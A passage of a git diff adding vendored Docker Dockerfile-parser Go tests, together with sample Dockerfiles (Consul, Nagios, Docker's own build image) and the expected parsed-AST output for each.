testDir) { + dockerfile := filepath.Join(testDir, dir, "Dockerfile") + resultfile := filepath.Join(testDir, dir, "result") + + df, err := os.Open(dockerfile) + if err != nil { + t.Fatalf("Dockerfile missing for %s: %v", dir, err) + } + defer df.Close() + + d := Directive{LookingForDirectives: true} + SetEscapeToken(DefaultEscapeToken, &d) + ast, err := Parse(df, &d) + if err != nil { + t.Fatalf("Error parsing %s's dockerfile: %v", dir, err) + } + + content, err := ioutil.ReadFile(resultfile) + if err != nil { + t.Fatalf("Error reading %s's result file: %v", dir, err) + } + + if runtime.GOOS == "windows" { + // CRLF --> CR to match Unix behavior + content = bytes.Replace(content, []byte{'\x0d', '\x0a'}, []byte{'\x0a'}, -1) + } + + if ast.Dump()+"\n" != string(content) { + fmt.Fprintln(os.Stderr, "Result:\n"+ast.Dump()) + fmt.Fprintln(os.Stderr, "Expected:\n"+string(content)) + t.Fatalf("%s: AST dump of dockerfile does not match result", dir) + } + } +} + +func TestParseWords(t *testing.T) { + tests := []map[string][]string{ + { + "input": {"foo"}, + "expect": {"foo"}, + }, + { + "input": {"foo bar"}, + "expect": {"foo", "bar"}, + }, + { + "input": {"foo\\ bar"}, + "expect": {"foo\\ bar"}, + }, + { + "input": {"foo=bar"}, + "expect": {"foo=bar"}, + }, + { + "input": {"foo bar 'abc xyz'"}, + "expect": {"foo", "bar", "'abc xyz'"}, + }, + { + "input": {`foo bar "abc xyz"`}, + "expect": {"foo", "bar", `"abc xyz"`}, + }, + { + "input": {"àöû"}, + "expect": {"àöû"}, + }, + { + "input": {`föo bàr "âbc xÿz"`}, + "expect": {"föo", "bàr", `"âbc xÿz"`}, + }, + } + + for _, test := range tests { + d := Directive{LookingForDirectives: true} + SetEscapeToken(DefaultEscapeToken, &d) + words := parseWords(test["input"][0], &d) + if len(words) != len(test["expect"]) { + t.Fatalf("length check failed. input: %v, expect: %q, output: %q", test["input"][0], test["expect"], words) + } + for i, word := range words { + if word != test["expect"][i] { + t.Fatalf("word check failed for word: %q. input: %q, expect: %q, output: %q", word, test["input"][0], test["expect"], words) + } + } + } +} + +func TestLineInformation(t *testing.T) { + df, err := os.Open(testFileLineInfo) + if err != nil { + t.Fatalf("Dockerfile missing for %s: %v", testFileLineInfo, err) + } + defer df.Close() + + d := Directive{LookingForDirectives: true} + SetEscapeToken(DefaultEscapeToken, &d) + ast, err := Parse(df, &d) + if err != nil { + t.Fatalf("Error parsing dockerfile %s: %v", testFileLineInfo, err) + } + + if ast.StartLine != 5 || ast.EndLine != 31 { + fmt.Fprintf(os.Stderr, "Wrong root line information: expected(%d-%d), actual(%d-%d)\n", 5, 31, ast.StartLine, ast.EndLine) + t.Fatalf("Root line information doesn't match result.") + } + if len(ast.Children) != 3 { + fmt.Fprintf(os.Stderr, "Wrong number of child: expected(%d), actual(%d)\n", 3, len(ast.Children)) + t.Fatalf("Root line information doesn't match result for %s", testFileLineInfo) + } + expected := [][]int{ + {5, 5}, + {11, 12}, + {17, 31}, + } + for i, child := range ast.Children { + if child.StartLine != expected[i][0] || child.EndLine != expected[i][1] { + t.Logf("Wrong line information for child %d: expected(%d-%d), actual(%d-%d)\n", + i, expected[i][0], expected[i][1], child.StartLine, child.EndLine) + t.Fatalf("Root line information doesn't match result.") + } + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfile-line/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfile-line/Dockerfile new file mode 100644 index 0000000000..c7601c9f69 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfile-line/Dockerfile @@ -0,0 +1,35 @@ +# ESCAPE=\ + + + +FROM brimstone/ubuntu:14.04 + + +# TORUN -v /var/run/docker.sock:/var/run/docker.sock + + +ENV GOPATH \ +/go + + + +# Install the packages we need, clean up after them and us +RUN apt-get update \ + && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean \ + + + && apt-get install -y --no-install-recommends git golang ca-certificates \ + && apt-get clean \ + && rm -rf /var/lib/apt/lists \ + + && go get -v github.com/brimstone/consuldock \ + && mv $GOPATH/bin/consuldock /usr/local/bin/consuldock \ + + && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \ + && apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \ + && rm /tmp/dpkg.* \ + && rm -rf $GOPATH + + + + diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/env_no_value/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/env_no_value/Dockerfile new file mode 100644 index 0000000000..1d65578794 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/env_no_value/Dockerfile @@ -0,0 +1,3 @@ +FROM busybox + +ENV PATH diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/shykes-nested-json/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/shykes-nested-json/Dockerfile new file mode 100644 index 0000000000..d1be4596c7 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/shykes-nested-json/Dockerfile @@ -0,0 +1 @@ +CMD [ "echo", [ "nested json" ] ] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/Dockerfile new file mode 100644 index 0000000000..00b444cba5 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/Dockerfile @@ -0,0 +1,11 @@ +FROM ubuntu:14.04 +MAINTAINER Seongyeol Lim + +COPY . /go/src/github.com/docker/docker +ADD . / +ADD null / +COPY nullfile /tmp +ADD [ "vimrc", "/tmp" ] +COPY [ "bashrc", "/tmp" ] +COPY [ "test file", "/tmp" ] +ADD [ "test file", "/tmp/test file" ] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/result new file mode 100644 index 0000000000..85aee64018 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/result @@ -0,0 +1,10 @@ +(from "ubuntu:14.04") +(maintainer "Seongyeol Lim ") +(copy "." "/go/src/github.com/docker/docker") +(add "." "/") +(add "null" "/") +(copy "nullfile" "/tmp") +(add "vimrc" "/tmp") +(copy "bashrc" "/tmp") +(copy "test file" "/tmp") +(add "test file" "/tmp/test file") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/Dockerfile new file mode 100644 index 0000000000..0364ef9d96 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/Dockerfile @@ -0,0 +1,26 @@ +#escape=\ +FROM brimstone/ubuntu:14.04 + +MAINTAINER brimstone@the.narro.ws + +# TORUN -v /var/run/docker.sock:/var/run/docker.sock + +ENV GOPATH /go + +# Set our command +ENTRYPOINT ["/usr/local/bin/consuldock"] + +# Install the packages we need, clean up after them and us +RUN apt-get update \ + && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean \ + && apt-get install -y --no-install-recommends git golang ca-certificates \ + && apt-get clean \ + && rm -rf /var/lib/apt/lists \ + + && go get -v github.com/brimstone/consuldock \ + && mv $GOPATH/bin/consuldock /usr/local/bin/consuldock \ + + && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \ + && apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \ + && rm /tmp/dpkg.* \ + && rm -rf $GOPATH diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/result new file mode 100644 index 0000000000..227f748cda --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/result @@ -0,0 +1,5 @@ +(from "brimstone/ubuntu:14.04") +(maintainer "brimstone@the.narro.ws") +(env "GOPATH" "/go") +(entrypoint "/usr/local/bin/consuldock") +(run "apt-get update \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean && apt-get install -y --no-install-recommends git golang ca-certificates && apt-get clean && rm -rf /var/lib/apt/lists \t&& go get -v github.com/brimstone/consuldock && mv $GOPATH/bin/consuldock /usr/local/bin/consuldock \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \t&& apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \t&& rm /tmp/dpkg.* \t&& rm -rf $GOPATH") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/Dockerfile new file mode 100644 index 0000000000..25ae352166 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/Dockerfile @@ -0,0 +1,52 @@ +FROM brimstone/ubuntu:14.04 + +CMD [] + +ENTRYPOINT ["/usr/bin/consul", "agent", "-server", "-data-dir=/consul", "-client=0.0.0.0", "-ui-dir=/webui"] + +EXPOSE 8500 8600 8400 8301 8302 + +RUN apt-get update \ + && apt-get install -y unzip wget \ + && apt-get clean \ + && rm -rf /var/lib/apt/lists + +RUN cd /tmp \ + && wget https://dl.bintray.com/mitchellh/consul/0.3.1_web_ui.zip \ + -O web_ui.zip \ + && unzip web_ui.zip \ + && mv dist /webui \ + && rm web_ui.zip + +RUN apt-get update \ + && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean \ + && apt-get install -y --no-install-recommends unzip wget \ + && apt-get clean \ + && rm -rf /var/lib/apt/lists \ + + && cd /tmp \ + && wget https://dl.bintray.com/mitchellh/consul/0.3.1_web_ui.zip \ + -O web_ui.zip \ + && unzip web_ui.zip \ + && mv dist /webui \ + && rm web_ui.zip \ + + && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \ + && apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \ + && rm /tmp/dpkg.* + +ENV GOPATH /go + +RUN apt-get update \ + && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean \ + && apt-get install -y --no-install-recommends git golang ca-certificates build-essential \ + && apt-get clean \ + && rm -rf /var/lib/apt/lists \ + + && go get -v github.com/hashicorp/consul \ + && mv $GOPATH/bin/consul /usr/bin/consul \ + + && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \ + && apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \ + && rm /tmp/dpkg.* \ + && rm -rf $GOPATH diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/result new file mode 100644 index 0000000000..16492e516a --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/result @@ -0,0 +1,9 @@ +(from "brimstone/ubuntu:14.04") +(cmd) +(entrypoint "/usr/bin/consul" "agent" "-server" "-data-dir=/consul" "-client=0.0.0.0" "-ui-dir=/webui") +(expose "8500" "8600" "8400" "8301" "8302") +(run "apt-get update && apt-get install -y unzip wget \t&& apt-get clean \t&& rm -rf /var/lib/apt/lists") +(run "cd /tmp && wget https://dl.bintray.com/mitchellh/consul/0.3.1_web_ui.zip -O web_ui.zip && unzip web_ui.zip && mv dist /webui && rm web_ui.zip") +(run "apt-get update \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean && apt-get install -y --no-install-recommends unzip wget && apt-get clean && rm -rf /var/lib/apt/lists && cd /tmp && wget https://dl.bintray.com/mitchellh/consul/0.3.1_web_ui.zip -O web_ui.zip && unzip web_ui.zip && mv dist /webui && rm web_ui.zip \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \t&& apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \t&& rm /tmp/dpkg.*") +(env "GOPATH" "/go") +(run "apt-get update \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean && apt-get install -y --no-install-recommends git golang ca-certificates build-essential && apt-get clean && rm -rf /var/lib/apt/lists \t&& go get -v github.com/hashicorp/consul \t&& mv $GOPATH/bin/consul /usr/bin/consul \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \t&& apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \t&& rm /tmp/dpkg.* \t&& rm -rf $GOPATH") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/Dockerfile new file mode 100644 index 0000000000..42b324e77b --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/Dockerfile @@ -0,0 +1,36 @@ +FROM ubuntu:14.04 + +RUN echo hello\ + world\ + goodnight \ + moon\ + light\ +ning +RUN echo hello \ + world +RUN echo hello \ +world +RUN echo hello \ +goodbye\ +frog +RUN echo hello \ +world +RUN echo hi \ + \ + world \ +\ + good\ +\ +night +RUN echo goodbye\ +frog +RUN echo good\ +bye\ +frog + +RUN echo hello \ +# this is a comment + +# this is a comment with a blank line surrounding it + +this is some more useful stuff diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/result new file mode 100644 index 0000000000..268ae073c8 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/result @@ -0,0 +1,10 @@ +(from "ubuntu:14.04") +(run "echo hello world goodnight moon lightning") +(run "echo hello world") +(run "echo hello world") +(run "echo hello goodbyefrog") +(run "echo hello world") +(run "echo hi world goodnight") +(run "echo goodbyefrog") +(run "echo goodbyefrog") +(run "echo hello this is some more useful stuff") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/Dockerfile new file mode 100644 index 0000000000..8ccb71a578 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/Dockerfile @@ -0,0 +1,54 @@ +FROM cpuguy83/ubuntu +ENV NAGIOS_HOME /opt/nagios +ENV NAGIOS_USER nagios +ENV NAGIOS_GROUP nagios +ENV NAGIOS_CMDUSER nagios +ENV NAGIOS_CMDGROUP nagios +ENV NAGIOSADMIN_USER nagiosadmin +ENV NAGIOSADMIN_PASS nagios +ENV APACHE_RUN_USER nagios +ENV APACHE_RUN_GROUP nagios +ENV NAGIOS_TIMEZONE UTC + +RUN sed -i 's/universe/universe multiverse/' /etc/apt/sources.list +RUN apt-get update && apt-get install -y iputils-ping netcat build-essential snmp snmpd snmp-mibs-downloader php5-cli apache2 libapache2-mod-php5 runit bc postfix bsd-mailx +RUN ( egrep -i "^${NAGIOS_GROUP}" /etc/group || groupadd $NAGIOS_GROUP ) && ( egrep -i "^${NAGIOS_CMDGROUP}" /etc/group || groupadd $NAGIOS_CMDGROUP ) +RUN ( id -u $NAGIOS_USER || useradd --system $NAGIOS_USER -g $NAGIOS_GROUP -d $NAGIOS_HOME ) && ( id -u $NAGIOS_CMDUSER || useradd --system -d $NAGIOS_HOME -g $NAGIOS_CMDGROUP $NAGIOS_CMDUSER ) + +ADD http://downloads.sourceforge.net/project/nagios/nagios-3.x/nagios-3.5.1/nagios-3.5.1.tar.gz?r=http%3A%2F%2Fwww.nagios.org%2Fdownload%2Fcore%2Fthanks%2F%3Ft%3D1398863696&ts=1398863718&use_mirror=superb-dca3 /tmp/nagios.tar.gz +RUN cd /tmp && tar -zxvf nagios.tar.gz && cd nagios && ./configure --prefix=${NAGIOS_HOME} --exec-prefix=${NAGIOS_HOME} --enable-event-broker --with-nagios-command-user=${NAGIOS_CMDUSER} --with-command-group=${NAGIOS_CMDGROUP} --with-nagios-user=${NAGIOS_USER} --with-nagios-group=${NAGIOS_GROUP} && make all && make install && make install-config && make install-commandmode && cp sample-config/httpd.conf /etc/apache2/conf.d/nagios.conf +ADD http://www.nagios-plugins.org/download/nagios-plugins-1.5.tar.gz /tmp/ +RUN cd /tmp && tar -zxvf nagios-plugins-1.5.tar.gz && cd nagios-plugins-1.5 && ./configure --prefix=${NAGIOS_HOME} && make && make install + +RUN sed -i.bak 's/.*\=www\-data//g' /etc/apache2/envvars +RUN export DOC_ROOT="DocumentRoot $(echo $NAGIOS_HOME/share)"; sed -i "s,DocumentRoot.*,$DOC_ROOT," /etc/apache2/sites-enabled/000-default + +RUN ln -s ${NAGIOS_HOME}/bin/nagios /usr/local/bin/nagios && mkdir -p /usr/share/snmp/mibs && chmod 0755 /usr/share/snmp/mibs && touch /usr/share/snmp/mibs/.foo + +RUN echo "use_timezone=$NAGIOS_TIMEZONE" >> ${NAGIOS_HOME}/etc/nagios.cfg && echo "SetEnv TZ \"${NAGIOS_TIMEZONE}\"" >> /etc/apache2/conf.d/nagios.conf + +RUN mkdir -p ${NAGIOS_HOME}/etc/conf.d && mkdir -p ${NAGIOS_HOME}/etc/monitor && ln -s /usr/share/snmp/mibs ${NAGIOS_HOME}/libexec/mibs +RUN echo "cfg_dir=${NAGIOS_HOME}/etc/conf.d" >> ${NAGIOS_HOME}/etc/nagios.cfg +RUN echo "cfg_dir=${NAGIOS_HOME}/etc/monitor" >> ${NAGIOS_HOME}/etc/nagios.cfg +RUN download-mibs && echo "mibs +ALL" > /etc/snmp/snmp.conf + +RUN sed -i 's,/bin/mail,/usr/bin/mail,' /opt/nagios/etc/objects/commands.cfg && \ + sed -i 's,/usr/usr,/usr,' /opt/nagios/etc/objects/commands.cfg +RUN cp /etc/services /var/spool/postfix/etc/ + +RUN mkdir -p /etc/sv/nagios && mkdir -p /etc/sv/apache && rm -rf /etc/sv/getty-5 && mkdir -p /etc/sv/postfix +ADD nagios.init /etc/sv/nagios/run +ADD apache.init /etc/sv/apache/run +ADD postfix.init /etc/sv/postfix/run +ADD postfix.stop /etc/sv/postfix/finish + +ADD start.sh /usr/local/bin/start_nagios + +ENV APACHE_LOCK_DIR /var/run +ENV APACHE_LOG_DIR /var/log/apache2 + +EXPOSE 80 + +VOLUME ["/opt/nagios/var", "/opt/nagios/etc", "/opt/nagios/libexec", "/var/log/apache2", "/usr/share/snmp/mibs"] + +CMD ["/usr/local/bin/start_nagios"] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/result new file mode 100644 index 0000000000..25dd3ddfe5 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/result @@ -0,0 +1,40 @@ +(from "cpuguy83/ubuntu") +(env "NAGIOS_HOME" "/opt/nagios") +(env "NAGIOS_USER" "nagios") +(env "NAGIOS_GROUP" "nagios") +(env "NAGIOS_CMDUSER" "nagios") +(env "NAGIOS_CMDGROUP" "nagios") +(env "NAGIOSADMIN_USER" "nagiosadmin") +(env "NAGIOSADMIN_PASS" "nagios") +(env "APACHE_RUN_USER" "nagios") +(env "APACHE_RUN_GROUP" "nagios") +(env "NAGIOS_TIMEZONE" "UTC") +(run "sed -i 's/universe/universe multiverse/' /etc/apt/sources.list") +(run "apt-get update && apt-get install -y iputils-ping netcat build-essential snmp snmpd snmp-mibs-downloader php5-cli apache2 libapache2-mod-php5 runit bc postfix bsd-mailx") +(run "( egrep -i \"^${NAGIOS_GROUP}\" /etc/group || groupadd $NAGIOS_GROUP ) && ( egrep -i \"^${NAGIOS_CMDGROUP}\" /etc/group || groupadd $NAGIOS_CMDGROUP )") +(run "( id -u $NAGIOS_USER || useradd --system $NAGIOS_USER -g $NAGIOS_GROUP -d $NAGIOS_HOME ) && ( id -u $NAGIOS_CMDUSER || useradd --system -d $NAGIOS_HOME -g $NAGIOS_CMDGROUP $NAGIOS_CMDUSER )") +(add "http://downloads.sourceforge.net/project/nagios/nagios-3.x/nagios-3.5.1/nagios-3.5.1.tar.gz?r=http%3A%2F%2Fwww.nagios.org%2Fdownload%2Fcore%2Fthanks%2F%3Ft%3D1398863696&ts=1398863718&use_mirror=superb-dca3" "/tmp/nagios.tar.gz") +(run "cd /tmp && tar -zxvf nagios.tar.gz && cd nagios && ./configure --prefix=${NAGIOS_HOME} --exec-prefix=${NAGIOS_HOME} --enable-event-broker --with-nagios-command-user=${NAGIOS_CMDUSER} --with-command-group=${NAGIOS_CMDGROUP} --with-nagios-user=${NAGIOS_USER} --with-nagios-group=${NAGIOS_GROUP} && make all && make install && make install-config && make install-commandmode && cp sample-config/httpd.conf /etc/apache2/conf.d/nagios.conf") +(add "http://www.nagios-plugins.org/download/nagios-plugins-1.5.tar.gz" "/tmp/") +(run "cd /tmp && tar -zxvf nagios-plugins-1.5.tar.gz && cd nagios-plugins-1.5 && ./configure --prefix=${NAGIOS_HOME} && make && make install") +(run "sed -i.bak 's/.*\\=www\\-data//g' /etc/apache2/envvars") +(run "export DOC_ROOT=\"DocumentRoot $(echo $NAGIOS_HOME/share)\"; sed -i \"s,DocumentRoot.*,$DOC_ROOT,\" /etc/apache2/sites-enabled/000-default") +(run "ln -s ${NAGIOS_HOME}/bin/nagios /usr/local/bin/nagios && mkdir -p /usr/share/snmp/mibs && chmod 0755 /usr/share/snmp/mibs && touch /usr/share/snmp/mibs/.foo") +(run "echo \"use_timezone=$NAGIOS_TIMEZONE\" >> ${NAGIOS_HOME}/etc/nagios.cfg && echo \"SetEnv TZ \\\"${NAGIOS_TIMEZONE}\\\"\" >> /etc/apache2/conf.d/nagios.conf") +(run "mkdir -p ${NAGIOS_HOME}/etc/conf.d && mkdir -p ${NAGIOS_HOME}/etc/monitor && ln -s /usr/share/snmp/mibs ${NAGIOS_HOME}/libexec/mibs") +(run "echo \"cfg_dir=${NAGIOS_HOME}/etc/conf.d\" >> ${NAGIOS_HOME}/etc/nagios.cfg") +(run "echo \"cfg_dir=${NAGIOS_HOME}/etc/monitor\" >> ${NAGIOS_HOME}/etc/nagios.cfg") +(run "download-mibs && echo \"mibs +ALL\" > /etc/snmp/snmp.conf") +(run "sed -i 's,/bin/mail,/usr/bin/mail,' /opt/nagios/etc/objects/commands.cfg && sed -i 's,/usr/usr,/usr,' /opt/nagios/etc/objects/commands.cfg") +(run "cp /etc/services /var/spool/postfix/etc/") +(run "mkdir -p /etc/sv/nagios && mkdir -p /etc/sv/apache && rm -rf /etc/sv/getty-5 && mkdir -p /etc/sv/postfix") +(add "nagios.init" "/etc/sv/nagios/run") +(add "apache.init" "/etc/sv/apache/run") +(add "postfix.init" "/etc/sv/postfix/run") +(add "postfix.stop" "/etc/sv/postfix/finish") +(add "start.sh" "/usr/local/bin/start_nagios") +(env "APACHE_LOCK_DIR" "/var/run") +(env "APACHE_LOG_DIR" "/var/log/apache2") +(expose "80") +(volume "/opt/nagios/var" "/opt/nagios/etc" "/opt/nagios/libexec" "/var/log/apache2" "/usr/share/snmp/mibs") +(cmd "/usr/local/bin/start_nagios") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/Dockerfile new file mode 100644 index 0000000000..99fbe55be0 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/Dockerfile @@ -0,0 +1,103 @@ +# This file describes the standard way to build Docker, using docker +# +# Usage: +# +# # Assemble the full dev environment. This is slow the first time. +# docker build -t docker . +# +# # Mount your source in an interactive container for quick testing: +# docker run -v `pwd`:/go/src/github.com/docker/docker --privileged -i -t docker bash +# +# # Run the test suite: +# docker run --privileged docker hack/make.sh test-unit test-integration-cli test-docker-py +# +# # Publish a release: +# docker run --privileged \ +# -e AWS_S3_BUCKET=baz \ +# -e AWS_ACCESS_KEY=foo \ +# -e AWS_SECRET_KEY=bar \ +# -e GPG_PASSPHRASE=gloubiboulga \ +# docker hack/release.sh +# +# Note: AppArmor used to mess with privileged mode, but this is no longer +# the case. Therefore, you don't have to disable it anymore. +# + +FROM ubuntu:14.04 +MAINTAINER Tianon Gravi (@tianon) + +# Packaged dependencies +RUN apt-get update && DEBIAN_FRONTEND=noninteractive apt-get install -yq \ + apt-utils \ + aufs-tools \ + automake \ + btrfs-tools \ + build-essential \ + curl \ + dpkg-sig \ + git \ + iptables \ + libapparmor-dev \ + libcap-dev \ + libsqlite3-dev \ + mercurial \ + pandoc \ + parallel \ + reprepro \ + ruby1.9.1 \ + ruby1.9.1-dev \ + s3cmd=1.1.0* \ + --no-install-recommends + +# Get lvm2 source for compiling statically +RUN git clone --no-checkout https://git.fedorahosted.org/git/lvm2.git /usr/local/lvm2 && cd /usr/local/lvm2 && git checkout -q v2_02_103 +# see https://git.fedorahosted.org/cgit/lvm2.git/refs/tags for release tags +# note: we don't use "git clone -b" above because it then spews big nasty warnings about 'detached HEAD' state that we can't silence as easily as we can silence them using "git checkout" directly + +# Compile and install lvm2 +RUN cd /usr/local/lvm2 && ./configure --enable-static_link && make device-mapper && make install_device-mapper +# see https://git.fedorahosted.org/cgit/lvm2.git/tree/INSTALL + +# Install Go +RUN curl -sSL https://golang.org/dl/go1.3.src.tar.gz | tar -v -C /usr/local -xz +ENV PATH /usr/local/go/bin:$PATH +ENV GOPATH /go:/go/src/github.com/docker/docker/vendor +RUN cd /usr/local/go/src && ./make.bash --no-clean 2>&1 + +# Compile Go for cross compilation +ENV DOCKER_CROSSPLATFORMS \ + linux/386 linux/arm \ + darwin/amd64 darwin/386 \ + freebsd/amd64 freebsd/386 freebsd/arm +# (set an explicit GOARM of 5 for maximum compatibility) +ENV GOARM 5 +RUN cd /usr/local/go/src && bash -xc 'for platform in $DOCKER_CROSSPLATFORMS; do GOOS=${platform%/*} GOARCH=${platform##*/} ./make.bash --no-clean 2>&1; done' + +# Grab Go's cover tool for dead-simple code coverage testing +RUN go get golang.org/x/tools/cmd/cover + +# TODO replace FPM with some very minimal debhelper stuff +RUN gem install --no-rdoc --no-ri fpm --version 1.0.2 + +# Get the "busybox" image source so we can build locally instead of pulling +RUN git clone -b buildroot-2014.02 https://github.com/jpetazzo/docker-busybox.git /docker-busybox + +# Setup s3cmd config +RUN /bin/echo -e '[default]\naccess_key=$AWS_ACCESS_KEY\nsecret_key=$AWS_SECRET_KEY' > /.s3cfg + +# Set user.email so crosbymichael's in-container merge commits go smoothly +RUN git config --global user.email 'docker-dummy@example.com' + +# Add an unprivileged user to be used for tests which need it +RUN groupadd -r docker +RUN useradd --create-home --gid docker unprivilegeduser + +VOLUME /var/lib/docker +WORKDIR /go/src/github.com/docker/docker +ENV DOCKER_BUILDTAGS apparmor selinux + +# Wrap all commands in the "docker-in-docker" script to allow nested containers +ENTRYPOINT ["hack/dind"] + +# Upload docker source +COPY . /go/src/github.com/docker/docker diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/result new file mode 100644 index 0000000000..d032f9bac4 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/result @@ -0,0 +1,24 @@ +(from "ubuntu:14.04") +(maintainer "Tianon Gravi (@tianon)") +(run "apt-get update && DEBIAN_FRONTEND=noninteractive apt-get install -yq \tapt-utils \taufs-tools \tautomake \tbtrfs-tools \tbuild-essential \tcurl \tdpkg-sig \tgit \tiptables \tlibapparmor-dev \tlibcap-dev \tlibsqlite3-dev \tmercurial \tpandoc \tparallel \treprepro \truby1.9.1 \truby1.9.1-dev \ts3cmd=1.1.0* \t--no-install-recommends") +(run "git clone --no-checkout https://git.fedorahosted.org/git/lvm2.git /usr/local/lvm2 && cd /usr/local/lvm2 && git checkout -q v2_02_103") +(run "cd /usr/local/lvm2 && ./configure --enable-static_link && make device-mapper && make install_device-mapper") +(run "curl -sSL https://golang.org/dl/go1.3.src.tar.gz | tar -v -C /usr/local -xz") +(env "PATH" "/usr/local/go/bin:$PATH") +(env "GOPATH" "/go:/go/src/github.com/docker/docker/vendor") +(run "cd /usr/local/go/src && ./make.bash --no-clean 2>&1") +(env "DOCKER_CROSSPLATFORMS" "linux/386 linux/arm \tdarwin/amd64 darwin/386 \tfreebsd/amd64 freebsd/386 freebsd/arm") +(env "GOARM" "5") +(run "cd /usr/local/go/src && bash -xc 'for platform in $DOCKER_CROSSPLATFORMS; do GOOS=${platform%/*} GOARCH=${platform##*/} ./make.bash --no-clean 2>&1; done'") +(run "go get golang.org/x/tools/cmd/cover") +(run "gem install --no-rdoc --no-ri fpm --version 1.0.2") +(run "git clone -b buildroot-2014.02 https://github.com/jpetazzo/docker-busybox.git /docker-busybox") +(run "/bin/echo -e '[default]\\naccess_key=$AWS_ACCESS_KEY\\nsecret_key=$AWS_SECRET_KEY' > /.s3cfg") +(run "git config --global user.email 'docker-dummy@example.com'") +(run "groupadd -r 